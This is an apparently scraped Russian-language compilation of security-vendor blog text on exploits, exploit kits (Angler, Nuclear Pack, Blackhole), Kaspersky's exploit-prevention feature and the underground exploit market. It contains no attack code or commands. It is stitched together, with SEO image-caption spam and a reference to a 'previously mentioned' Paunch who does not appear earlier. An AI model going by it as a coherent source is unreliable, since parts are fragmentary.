Как поясняСтся Π² ΡΡ‚Π°Ρ‚ΡŒΠ΅ Securelist, эксплойты ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Ρ‹ для Π°Ρ‚Π°ΠΊΠΈ ΠΊΠΎΠ½ΠΊΡ€Π΅Ρ‚Π½Ρ‹Ρ… вСрсий ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ³ΠΎ обСспСчСния, содСрТащСго уязвимости. Π’Π°ΠΊΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ, Ссли Ρƒ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ нуТная вСрсия ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ³ΠΎ обСспСчСния ΠΏΡ€ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠΈ врСдоносного ΠΎΠ±ΡŠΠ΅ΠΊΡ‚Π° ΠΈΠ»ΠΈ Ссли Π²Π΅Π±-сайт ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ это ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ΅ обСспСчСниС для Ρ€Π°Π±ΠΎΡ‚Ρ‹, Ρ‚ΠΎ запускаСтся эксплойт.

ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ ΠΎΠ½ ΠΏΠΎΠ»ΡƒΡ‡Π°Π΅Ρ‚ доступ посрСдством уязвимости, эксплойт Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Π΄ΠΎΠΏΠΎΠ»Π½ΠΈΡ‚Π΅Π»ΡŒΠ½Ρ‹Π΅ врСдоносныС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ с сСрвСра прСступников, ΠΎΡΡƒΡ‰Π΅ΡΡ‚Π²Π»ΡΡŽΡ‰ΠΈΠ΅ ΠΏΠΎΠ΄Ρ€Ρ‹Π²Π½ΡƒΡŽ Π΄Π΅ΡΡ‚Π΅Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ, Ρ‚Π°ΠΊΡƒΡŽ ΠΊΠ°ΠΊ ΠΊΡ€Π°ΠΆΠ° Π»ΠΈΡ‡Π½Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹Ρ…, использованиС ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π° Π² качСствС элСмСнта Π±ΠΎΡ‚Π½Π΅Ρ‚Π° для рассылки спама ΠΈΠ»ΠΈ выполнСния DDoS-Π°Ρ‚Π°ΠΊ ΠΈ Ρ‚Π°ΠΊ Π΄Π°Π»Π΅Π΅.

Эксплойты ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²Π»ΡΡŽΡ‚ ΡƒΠ³Ρ€ΠΎΠ·Ρƒ Π΄Π°ΠΆΠ΅ для остороТных ΠΈ добросовСстных ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ рСгулярно ΠΎΠ±Π½ΠΎΠ²Π»ΡΡŽΡ‚ своС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠ΅ обСспСчСниС. ΠŸΡ€ΠΈΡ‡ΠΈΠ½Π° кроСтся Π²ΠΎ Π²Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΌ Π·Π°Π·ΠΎΡ€Π΅ ΠΌΠ΅ΠΆΠ΄Ρƒ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠ΅ΠΌ уязвимости ΠΈ Π²Ρ‹Ρ…ΠΎΠ΄ΠΎΠΌ ΠΏΠ°Ρ‚Ρ‡Π° для Π΅Π΅ исправлСния.

Π’ этом ΠΈΠ½Ρ‚Π΅Ρ€Π²Π°Π»Π΅ эксплойты ΠΌΠΎΠ³ΡƒΡ‚ свободно Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ ΠΈ ΡƒΠ³Ρ€ΠΎΠΆΠ°Ρ‚ΡŒ бСзопасности ΠΏΠΎΡ‡Ρ‚ΠΈ всСх ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚-ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ ΠΏΡ€ΠΈ отсутствии установлСнных Π² систСмС автоматичСских срСдств прСдотвращСния Π°Ρ‚Π°ΠΊ эксплойтов. ΠžΠΏΡΡ‚ΡŒ ΠΆΠ΅, Π½Π΅ Π±ΡƒΠ΄Π΅ΠΌ Π·Π°Π±Ρ‹Π²Π°Ρ‚ΡŒ ΠΏΡ€ΠΎ синдром ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Ρ… Π²ΠΊΠ»Π°Π΄ΠΎΠΊ β€” своСврСмСнноС ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ Π·Π°Ρ‡Π°ΡΡ‚ΡƒΡŽ Ρ‚Ρ€Π΅Π±ΡƒΠ΅Ρ‚ ΠΎΡ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Ρ Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… ΠΆΠ΅Ρ€Ρ‚Π², Π½Π° ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π½Π΅ всС Π³ΠΎΡ‚ΠΎΠ²Ρ‹ ΠΏΠΎΠΉΡ‚ΠΈ сразу Π² ΠΌΠΎΠΌΠ΅Π½Ρ‚ Π²Ρ‹Ρ…ΠΎΠ΄Π° Π·Π°ΠΏΠ»Π°Ρ‚ΠΊΠΈ.

Эксплойты ходят стаями

Эксплойты часто ΡƒΠΏΠ°ΠΊΠΎΠ²Π°Π½Ρ‹ вмСстС β€” Ρ‚Π°ΠΊ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΈΡ‚ΡŒ систСму-мишСнь Π½Π° ΡˆΠΈΡ€ΠΎΠΊΠΈΠΉ спСктр уязвимостСй. Как Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π²Ρ‹ΡΠ²Π»ΡΡŽΡ‚ΡΡ ΠΎΠ΄Π½Π° ΠΈΠ»ΠΈ нСсколько, Π² Π΄Π΅Π»ΠΎ Π²ΡΡ‚ΡƒΠΏΠ°ΡŽΡ‚ ΡΠΎΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²ΡƒΡŽΡ‰ΠΈΠ΅ эксплойты. Наборы эксплойтов Ρ‚Π°ΠΊΠΆΠ΅ ΡˆΠΈΡ€ΠΎΠΊΠΎ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΡŽΡ‚ ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΌΠ΅Ρ‚ΠΎΠ΄Ρ‹ запутывания ΠΊΠΎΠ΄Π° (спСциалисты Π½Π°Π·Ρ‹Π²Π°ΡŽΡ‚ это ΡƒΠΌΠ½Ρ‹ΠΌ словом «обфускация»), Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΈΠ·Π±Π΅ΠΆΠ°Ρ‚ΡŒ обнаруТСния ΠΈ замСсти ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚-адрСса с Ρ†Π΅Π»ΡŒΡŽ ΠΏΠΎΠΌΠ΅ΡˆΠ°Ρ‚ΡŒ исслСдоватСлям ΠΈΡ… Π²Ρ‹Ρ‡ΠΈΡΠ»ΠΈΡ‚ΡŒ.

ΠŸΠ΅Ρ€Π΅Ρ‡ΠΈΡΠ»ΠΈΠΌ нСсколько Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ извСстных Π½Π°Π±ΠΎΡ€ΠΎΠ² эксплойтов, ΠΈΠ»ΠΈ, ΠΊΠ°ΠΊ Π΅Ρ‰Π΅ ΠΈΡ… Π½Π°Π·Ρ‹Π²Π°ΡŽΡ‚, эксплойт-ΠΊΠΈΡ‚ΠΎΠ²:

Angler β€” ΠΎΠ΄ΠΈΠ½ ΠΈΠ· самых слоТных Π½Π°Π±ΠΎΡ€ΠΎΠ² Π½Π° Ρ‡Π΅Ρ€Π½ΠΎΠΌ Ρ€Ρ‹Π½ΠΊΠ΅. Π­Ρ‚ΠΎΡ‚ Π½Π°Π±ΠΎΡ€ эксплойтов своим появлСниСм ΠΈΠ·ΠΌΠ΅Π½ΠΈΠ» ΠΏΡ€Π°Π²ΠΈΠ»Π° ΠΈΠ³Ρ€Ρ‹, послС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ Π½Π°Ρ‡Π°Π» ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Ρ‚ΡŒ антивирусы ΠΈ Π²ΠΈΡ€Ρ‚ΡƒΠ°Π»ΡŒΠ½Ρ‹Π΅ ΠΌΠ°ΡˆΠΈΠ½Ρ‹ (часто ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅ΠΌΡ‹Π΅ экспСртами ΠΏΠΎ бСзопасности ΠΊΠ°ΠΊ ΠΏΡ€ΠΈΠΌΠ°Π½ΠΊΠΈ) ΠΈ Π·Π°Π΄Π΅ΠΉΡΡ‚Π²ΠΎΠ²Π°Ρ‚ΡŒ ΡˆΠΈΡ„Ρ€ΠΎΠ²Π°Π½Π½Ρ‹Π΅ Ρ„Π°ΠΉΠ»Ρ‹ для затруднСния исслСдования. Π­Ρ‚ΠΎ ΠΎΠ΄ΠΈΠ½ ΠΈΠ· Ρ‚Π΅Ρ… Π½Π°Π±ΠΎΡ€ΠΎΠ² эксплойтов, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ быстрСС всСго Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‚ Π² свой арсСнал Π½Π΅Π΄Π°Π²Π½ΠΎ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ уязвимости Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня, Π° Π΅Π³ΠΎ врСдоносныС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ Ρ€Π°Π±ΠΎΡ‚Π°ΡŽΡ‚ Π² памяти, Π±Π΅Π· записи Π½Π° ТСстких дисках ΠΆΠ΅Ρ€Ρ‚Π². Π‘ тСхничСским описаниСм ΠΏΠ°ΠΊΠ΅Ρ‚Π° ΠΌΠΎΠΆΠ½ΠΎ ΠΎΠ·Π½Π°ΠΊΠΎΠΌΠΈΡ‚ΡŒΡΡ здСсь.

Nuclear Pack β€” ΠΏΠΎΡ€Π°ΠΆΠ°Π΅Ρ‚ ΠΆΠ΅Ρ€Ρ‚Π² эксплойтами Java ΠΈ Adobe PDF, Π° Ρ‚Π°ΠΊΠΆΠ΅ подсаТиваСт Caphaw β€” ΠΏΠ΅Ρ‡Π°Π»ΡŒΠ½ΠΎ извСстный банковский троян. ΠŸΠΎΠ΄Ρ€ΠΎΠ±Π½Π΅Π΅ Ρ‡ΠΈΡ‚Π°ΠΉΡ‚Π΅ здСсь.

Blackhole Kit β€” Π½Π°ΠΈΠ±ΠΎΠ»Π΅Π΅ распространСнная Π²Π΅Π±-ΡƒΠ³Ρ€ΠΎΠ·Π° Π² 2012 Π³ΠΎΠ΄Ρƒ, нацСлСнная Π½Π° уязвимости Π² старых вСрсиях Π±Ρ€Π°ΡƒΠ·Π΅Ρ€ΠΎΠ² Firefox, Chrome, Internet Explorer ΠΈ Safari, Π° Ρ‚Π°ΠΊΠΆΠ΅ ΠΌΠ½ΠΎΠ³ΠΈΡ… популярных ΠΏΠ»Π°Π³ΠΈΠ½ΠΎΠ², Ρ‚Π°ΠΊΠΈΡ… ΠΊΠ°ΠΊ Adobe Flash, Adobe Acrobat ΠΈ Java. ПослС Ρ‚ΠΎΠ³ΠΎ ΠΊΠ°ΠΊ ΠΆΠ΅Ρ€Ρ‚Π²Ρƒ Π·Π°ΠΌΠ°Π½ΠΈΠ»ΠΈ ΠΈΠ»ΠΈ ΠΏΠ΅Ρ€Π΅Π½Π°ΠΏΡ€Π°Π²ΠΈΠ»ΠΈ Π½Π° страницу подсадки, Π·Π°ΠΏΡƒΡ‚Π°Π½Π½Ρ‹ΠΉ JavaScript опрСдСляСт содСрТимоС ΠΌΠ°ΡˆΠΈΠ½Ρ‹ ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹ ΠΈ Π·Π°Π³Ρ€ΡƒΠΆΠ°Π΅Ρ‚ Ρ‚Π΅ эксплойты, для ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… Π΄Π°Π½Π½Ρ‹ΠΉ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ уязвим.

Blackhole, Π² ΠΎΡ‚Π»ΠΈΡ‡ΠΈΠ΅ ΠΎΡ‚ Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²Π° Π΄Ρ€ΡƒΠ³ΠΈΡ… эксплойт-ΠΊΠΈΡ‚ΠΎΠ², Π΄Π°ΠΆΠ΅ удостоился ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½ΠΎΠΉ ΡΡ‚Π°Ρ‚ΡŒΠΈ Π² Β«Π’ΠΈΠΊΠΈΠΏΠ΅Π΄ΠΈΠΈΒ», хотя послС арСста Π²Ρ‹ΡˆΠ΅ΡƒΠΏΠΎΠΌΡΠ½ΡƒΡ‚ΠΎΠ³ΠΎ Paunch сам Π½Π°Π±ΠΎΡ€ практичСски Π²Ρ‹ΡˆΠ΅Π» Π² Ρ‚ΠΈΡ€Π°ΠΆ.

Π’Ρ‹Π²ΠΎΠ΄

Как сказано Π²Ρ‹ΡˆΠ΅, эксплойты β€” ΠΏΠΎΠ΄Π²ΠΈΠ΄ врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ, Π½ΠΎ ΠΎΠ½ΠΈ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°ΡŽΡ‚ΡΡ Π½Π΅ всСми Π·Π°Ρ‰ΠΈΡ‚Π½Ρ‹ΠΌΠΈ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌΠΈ. Для ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎΠ³ΠΎ обнаруТСния Π½Π΅ΠΎΠ±Ρ…ΠΎΠ΄ΠΈΠΌΠΎ, Ρ‡Ρ‚ΠΎΠ±Ρ‹ Π·Π°Ρ‰ΠΈΡ‚Π½ΠΎΠ΅ Ρ€Π΅ΡˆΠ΅Π½ΠΈΠ΅ использовало повСдСнчСский Π°Π½Π°Π»ΠΈΠ· β€” это СдинствСнный Π½Π°Π΄Π΅ΠΆΠ½Ρ‹ΠΉ ΠΌΠ΅Ρ‚ΠΎΠ΄ Π±ΠΎΡ€ΡŒΠ±Ρ‹ с эксплойтами. ВрСдоносныС ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ многочислСнными ΠΈ Ρ€Π°Π·Π½ΠΎΠΎΠ±Ρ€Π°Π·Π½Ρ‹ΠΌΠΈ, Π½ΠΎ Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎ ΠΈΠ· Π½ΠΈΡ… ΠΈΠΌΠ΅ΡŽΡ‚ ΠΏΠΎΡ…ΠΎΠΆΠΈΠ΅ Ρ‡Π΅Ρ€Ρ‚Ρ‹ повСдСния.

Π§Ρ‚ΠΎ Ρ‚Π°ΠΊΠΎΠ΅ эксплойты ΠΈ ΠΏΠΎΡ‡Π΅ΠΌΡƒ ΠΈΡ… всС Ρ‚Π°ΠΊ боятся?

ΠŸΠΎΠ΄ΠΎΠ±Π½Ρ‹ΠΉ ΠΌΠ΅Ρ‚ΠΎΠ΄ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΡƒΠ΅Ρ‚ΡΡ Π² Kaspersky Internet Security ΠΈ Π΄Ρ€ΡƒΠ³ΠΈΡ… ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Π°Ρ… Β«Π›Π°Π±ΠΎΡ€Π°Ρ‚ΠΎΡ€ΠΈΠΈ ΠšΠ°ΡΠΏΠ΅Ρ€ΡΠΊΠΎΠ³ΠΎΒ» β€” ΡΠΎΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²ΡƒΡŽΡ‰Π°Ρ Ρ‡Π°ΡΡ‚ΡŒ Π½Π°ΡˆΠΈΡ… Π·Π°Ρ‰ΠΈΡ‚Π½Ρ‹Ρ… Ρ€Π΅ΡˆΠ΅Π½ΠΈΠΉ называСтся «АвтоматичСская Π·Π°Ρ‰ΠΈΡ‚Π° ΠΎΡ‚ эксплойтов» (ΠΈΠ»ΠΈ AEP β€” Automatic Exploit Prevention). Π₯Π°Ρ€Π°ΠΊΡ‚Π΅Ρ€Π½ΠΎΠ΅ ΠΏΠΎΠ²Π΅Π΄Π΅Π½ΠΈΠ΅ эксплойтов ΠΏΠΎΠΌΠΎΠ³Π°Π΅Ρ‚ ΠΏΡ€Π΅Π΄ΠΎΡ‚Π²Ρ€Π°Ρ‚ΠΈΡ‚ΡŒ Π·Π°Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅ Π΄Π°ΠΆΠ΅ Π² случаС эксплуатации Ρ€Π°Π½Π΅Π΅ нСизвСстной уязвимости Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня.

Π‘ΠΎΠ»Π΅Π΅ ΠΏΠΎΠ΄Ρ€ΠΎΠ±Π½ΡƒΡŽ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎ Ρ‚Π΅Ρ…Π½ΠΎΠ»ΠΎΠ³ΠΈΠΈ Automatic Exploit Prevention ΠΌΠΎΠΆΠ½ΠΎ Π½Π°ΠΉΡ‚ΠΈ здСсь.

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ

Π’Π·Π»Ρ‘Ρ‚Ρ‹ ΠΈ падСния Ρ€Ρ‹Π½ΠΊΠ° эксплойтов

Π’ послСдниС Π³ΠΎΠ΄Ρ‹ ΠΏΠΎΠ΄ΠΏΠΎΠ»ΡŒΠ½Ρ‹ΠΉ Ρ€Ρ‹Π½ΠΎΠΊ эксплойтов сильно измСнился. Если Ρ€Π°Π½ΡŒΡˆΠ΅ ΠΈΡ… ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ° Π±Ρ‹Π»Π° практичСски СдинствСнным способом Π·Π°Ρ€Π°Π±ΠΎΡ‚Π°Ρ‚ΡŒ, Ρ‚ΠΎ сСйчас появились Π°Π»ΡŒΡ‚Π΅Ρ€Π½Π°Ρ‚ΠΈΠ²Π½Ρ‹Π΅ способы ΠΌΠΎΠ½Π΅Ρ‚ΠΈΠ·Π°Ρ†ΠΈΠΈ. Π’ Ρ‚Π΅Ρ‡Π΅Π½ΠΈΠ΅ Π΄Π²ΡƒΡ… Π»Π΅Ρ‚ ΠΌΡ‹ ΠΈΠ·ΡƒΡ‡Π°Π»ΠΈ, ΠΊΠ°ΠΊ устроСн ΠΏΠΎΠ΄ΠΏΠΎΠ»ΡŒΠ½Ρ‹ΠΉ Ρ€Ρ‹Π½ΠΎΠΊ эксплойтов для Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹Ρ… уязвимостСй, ΠΈ Π² этом постС подСлимся Ρ€Π΅Π·ΡƒΠ»ΡŒΡ‚Π°Ρ‚Π°ΠΌΠΈ нашСго исслСдования ΠΆΠΈΠ·Π½Π΅Π½Π½ΠΎΠ³ΠΎ Ρ†ΠΈΠΊΠ»Π° эксплойта Π½Π° Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… кибСрпрСступного Π°Π½Π΄Π΅Ρ€Π³Ρ€Π°ΡƒΠ½Π΄Π°.

О Ρ‚Π΅Ρ€ΠΌΠΈΠ½ΠΎΠ»ΠΎΠ³ΠΈΠΈ

ΠŸΡ€Π΅ΠΆΠ΄Π΅ Ρ‡Π΅ΠΌ ΠΏΡ€ΠΎΠ΄ΠΎΠ»ΠΆΠ°Ρ‚ΡŒ рассказ, ΠΎΠ±ΠΎΠ·Π½Π°Ρ‡ΠΈΠΌ, Ρ‡Ρ‚ΠΎ ΠΏΠΎΠ΄ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒΡŽ ΠΌΡ‹ ΠΏΠΎΠ½ΠΈΠΌΠ°Π΅ΠΌ нСдостаток, ΡΠ»Π°Π±ΠΎΡΡ‚ΡŒ ΠΈΠ»ΠΈ ΠΎΡˆΠΈΠ±ΠΊΡƒ Π² ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ½ΠΎΠΌ ΠΈΠ»ΠΈ Π°ΠΏΠΏΠ°Ρ€Π°Ρ‚Π½ΠΎΠΌ обСспСчСнии. Если эта ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π΅Ρ‰Ρ‘ Π½Π΅ Π±Ρ‹Π»Π° раскрыта ΠΏΡƒΠ±Π»ΠΈΡ‡Π½ΠΎ ΠΈΠ»ΠΈ Π±Ρ‹Π»Π° раскрыта, Π½ΠΎ Π΄ΠΎ сих ΠΏΠΎΡ€ Π½Π΅ исправлСна, ΠΌΡ‹ Π½Π°Π·Ρ‹Π²Π°Π΅ΠΌ Π΅Ρ‘ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒΡŽ Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня (0-day). Как Ρ‚ΠΎΠ»ΡŒΠΊΠΎ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ становится ΠΏΡƒΠ±Π»ΠΈΡ‡Π½ΠΎΠΉ ΠΈ для Π½Π΅Ρ‘ выпускаСтся исправлСниС, ΠΎΠ½Π° ΠΏΠ΅Ρ€Π΅Ρ…ΠΎΠ΄ΠΈΡ‚ Π² разряд извСстных уязвимостСй (N-day).

Эксплойт β€” это ΡΠΏΠ΅Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹ΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ написанный ΠΊΠΎΠ΄, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ позволяСт ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ 0-day- ΠΈΠ»ΠΈ N-day-ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ для проникновСния Π² систСму, извлСчСния Π΄Π°Π½Π½Ρ‹Ρ… ΠΈ/ΠΈΠ»ΠΈ Π΄Π°Ρ‘Ρ‚ Π΄Ρ€ΡƒΠ³ΠΈΠ΅ возмоТности Π΅Ρ‘ нСсанкционированного использования.

Π§Ρ‚ΠΎ измСнилось Π½Π° Ρ€Ρ‹Π½ΠΊΠ΅ эксплойтов

ΠŸΡ€Π΅ΠΆΠ΄Π΅ Ρ€Ρ‹Π½ΠΎΠΊ эксплойтов Π±Ρ‹Π» Π±ΠΎΠ»Π΅Π΅ ΠΏΡ€ΠΈΠ±Ρ‹Π»ΡŒΠ½Ρ‹ΠΌ. Об этом ΡΠ²ΠΈΠ΄Π΅Ρ‚Π΅Π»ΡŒΡΡ‚Π²ΡƒΠ΅Ρ‚ ΡƒΠΌΠ΅Π½ΡŒΡˆΠ΅Π½ΠΈΠ΅ количСства объявлСний Π½Π° ΠΏΠΎΠ΄ΠΏΠΎΠ»ΡŒΠ½Ρ‹Ρ… Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ…, хотя ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ· Π²ΠΎΠ·ΠΌΠΎΠΆΠ½Ρ‹Ρ… ΠΏΡ€ΠΈΡ‡ΠΈΠ½ этого явлСния ΠΌΠΎΠΆΠ΅Ρ‚ Π±Ρ‹Ρ‚ΡŒ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Ρ‰Π΅Π½ΠΈΠ΅ Ρ‚ΠΎΡ€Π³ΠΎΠ²Ρ‹Ρ… ΠΏΠ»ΠΎΡ‰Π°Π΄ΠΎΠΊ Π² Π±ΠΎΠ»Π΅Π΅ Π·Π°ΠΊΡ€Ρ‹Ρ‚Ρ‹Π΅ пространства, Π½Π°ΠΏΡ€ΠΈΠΌΠ΅Ρ€, Π² Π΄Π°Ρ€ΠΊΠ½Π΅Ρ‚.

Π‘Π½ΠΈΠΆΠ΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ±Ρ‹Π»ΠΈ ΠΎΡ‚ Ρ‚ΠΎΡ€Π³ΠΎΠ²Π»ΠΈ эксплойтами Ρ‚Π°ΠΊΠΆΠ΅ ΠΌΠΎΠΆΠ½ΠΎ ΡΠ²ΡΠ·Π°Ρ‚ΡŒ с ростом Π²Ρ‹ΠΏΠ»Π°Ρ‚ ΠΏΠΎ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌ Bug Bounty β€” ΠΎΡ…ΠΎΡ‚Ρƒ Π·Π° Π±Π°Π³Π°ΠΌΠΈ β€” объявили практичСски всС извСстныС Π²Π΅Π½Π΄ΠΎΡ€Ρ‹.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитомВыплаты Microsoft ΠΏΠΎ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ°ΠΌ Bug Bounty. Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: Microsoft Security Response Center

НапримСр, Microsoft Π·Π° 2019 Π³ΠΎΠ΄ Π²Ρ‹ΠΏΠ»Π°Ρ‚ΠΈΠ»Π° 13,7 ΠΌΠ»Π½ Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША исслСдоватСлям, ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²ΡˆΠΈΠΌ уязвимости. Бамая большая Π²Ρ‹ΠΏΠ»Π°Ρ‚Π° составила 200 тыс. Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША β€” Π΅Ρ‘ ΠΏΠΎΠ»ΡƒΡ‡ΠΈΠ» экспСрт, ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²ΡˆΠΈΠΉ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Hyper-V.

Π’ΠΎΠ·ΠΌΠΎΠΆΠ½ΠΎΡΡ‚ΡŒ лСгально ΠΏΠΎΠ»ΡƒΡ‡ΠΈΡ‚ΡŒ ΠΊΡ€ΡƒΠΏΠ½ΠΎΠ΅ Π²ΠΎΠ·Π½Π°Π³Ρ€Π°ΠΆΠ΄Π΅Π½ΠΈΠ΅ ΠΏΡ€ΠΈΠ²ΠΎΠ΄ΠΈΡ‚ ΠΊ частичной Π΄Π΅ΠΊΡ€ΠΈΠΌΠΈΠ½Π°Π»ΠΈΠ·Π°Ρ†ΠΈΠΈ Ρ€Ρ‹Π½ΠΊΠ° эксплойтов ΠΈ Π΄Π΅Π»Π°Π΅Ρ‚ Π΅Π³ΠΎ Π±ΠΎΠ»Π΅Π΅ скудным ΠΈ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Ρ‡ΠΈΠ²Ρ‹ΠΌ.

